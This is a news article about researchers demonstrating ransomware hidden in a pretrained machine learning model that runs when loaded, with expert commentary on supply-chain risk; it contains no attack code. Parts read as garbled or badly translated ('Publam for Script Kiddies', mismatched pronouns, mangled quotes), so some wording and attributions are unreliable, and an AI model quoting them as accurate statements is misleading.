As if defenders of the software supply chain didn’t have enough attack vectors to worry about, they now have a new one: machine learning models.

ML models are at the heart of technologies such as facial recognition and chatbots. Like open-source software repositories, models are often downloaded and shared by developers and data scientists, so a compromised model can have effects on multiple organizations at once.

Researchers from machine language security company HiddenLayer revealed in a blog post on Tuesday how an attacker could use a popular ML model to deploy ransomware.

The method described by the researchers is similar to how hackers use steganography to hide malicious payloads in images. In the case of ML models, the malicious code is hidden in the model’s data.

According to the researchers, the steganography process is quite general and can be implemented on most ML libraries. He added that the process need not be limited to embedding malicious code in models and can also be used to extract data from an organization.

machine learning model hijacking

Image Courtesy of HiddenLayer


Attacks can also be operating system agnostic. The researchers pointed out that OS and architecture-specific payloads can be embedded in the model, where they can be loaded dynamically at runtime depending on the platform.

flying under the radar

Tom Bonner, senior director of adversarial threat research at Austin, Texas-based HiddenLayer, said that embedding malware in ML models provides some advantage to an adversary.

“It allows them to fly under the radar,” Bonner told TechNewsWorld. “This is not a technology that is detected by current antivirus or EDR software.”

“It also opens up new targets for them,” he said. “It’s a direct route into data scientist systems. It’s possible to dump machine learning models hosted on public repositories. Data scientists will pull it down and load it, then it’s patched.”

“These models are also downloaded to various machine-learning ops platforms, which can be very scary because they can have access to Amazon S3 buckets and steal training data,” he continued.

“most of [the] Machines running machine-learning models tend to have bigger, fatter GPUs, so bitcoin miners can be very effective on those systems as well,” he said.

HiddenLayer demonstrates how its hijacked pre-trained ResNet model executed a ransomware sample the moment it was loaded into memory by PyTorch on its test machine.


first mover advantage

Chris Clements, vice president of solutions architecture at Cerberus Sentinel, a cybersecurity consulting and penetration testing company in Scottsdale, Ariz., often likes to exploit unanticipated vulnerabilities in new technologies.

“Attackers looking for first-mover advantage in these frontiers can enjoy both less preparation and proactive protection by exploiting new technologies,” Clements told TechNewsWorld.

“This attack on machine-language models looks like it could be the next phase of the cat-and-mouse game between attackers and defenders,” he said.

Threat actors will take advantage of whatever vectors they can to carry out their attacks, explained Mike Parkin, senior technical engineer at Vulkan Cyber, a provider of SaaS for enterprise cyber risk remediation in Tel Aviv, Israel.

“It’s an unusual vector that can outperform some common tools if done carefully,” Parkin told TechNewsWorld.

Traditional anti-malware and endpoint detection and response solutions are designed to detect ransomware based on pattern-based behaviors, including virus signatures and monitoring key API, file, and registry requests on Windows for potential malicious activity , Chief Security Officer Morey Haber explained. BeyondTrust, a developer of privileged account management and vulnerability management solutions in Carlsbad, California.

“If machine learning is applied to the delivery of malware such as ransomware, traditional attack vectors and even detection methods can be changed to appear non-malicious,” Haber told TechNewsWorld.

potential for extensive damage

Attacks on machine-language models are on the rise, said Karen Crowley, director of product solutions at Deep Instinct, a deep-learning cybersecurity company in New York City.

“It’s not critical yet, but widespread damage is likely,” Crowley told TechNewsworld.

“In the supply chain, if the data is poisoned so that when the model is trained, the system is also poisoned, then that model can make decisions that reduce rather than strengthen protection,” he explained.

“In the cases of Log4j and SolarWinds, we saw an impact not only on the organization that has the software, but all of its users in that chain,” she said. “Once ML is introduced, the damage can add up quickly.”

Casey Ellis, CTO and founder of BugCrowd, which operates a crowdsourced bug bounty platform, said attacks on ML models could be part of a larger trend of attacks on software supply chains.

Ellis told TechNewsWorld, “Just as adversaries can attempt to compromise the supply chain of software applications to insert malicious code or vulnerabilities, they can also compromise the supply chain of machine learning models to insert malicious or biased data or algorithms.” can also target.

“This can have a significant impact on the reliability and integrity of AI systems and can be used to undermine trust in the technology,” he said.

Publam for Script Kiddies

Threat actors may show increased interest in machine models because they are more vulnerable to people than they thought.

“People have known this was possible for a while, but they didn’t realize how easy it was,” Bonner said. “It’s fairly trivial to put together an attack with a few simple scripts.”

He added, “Now that people have realized how easy it is, this script is in the realm of children.”

Clements agreed that the researchers have shown that it does not require hardcore ML/AI data science expertise to insert malicious commands into training data that can then be triggered by ML models at runtime.

However, he continued, more sophistication is required than run-of-the-mill ransomware attacks that rely primarily on simple credential stuffing or phishing to launch.

“Right now, I think the popularity of the specific attack vector is likely to subside for the foreseeable future,” he said.

“Exploiting this requires an attacker compromising the upstream ML model project used by downstream developers to download pre-trained ML models to the victim, with embedded malicious commands from an unauthenticated source.” exploits,” he explained.

“In each of these scenarios,” he continued, “it appears that there would be much easier and more straightforward ways to compromise the target than simply inserting entangled exploits into the training data.”

Write A Comment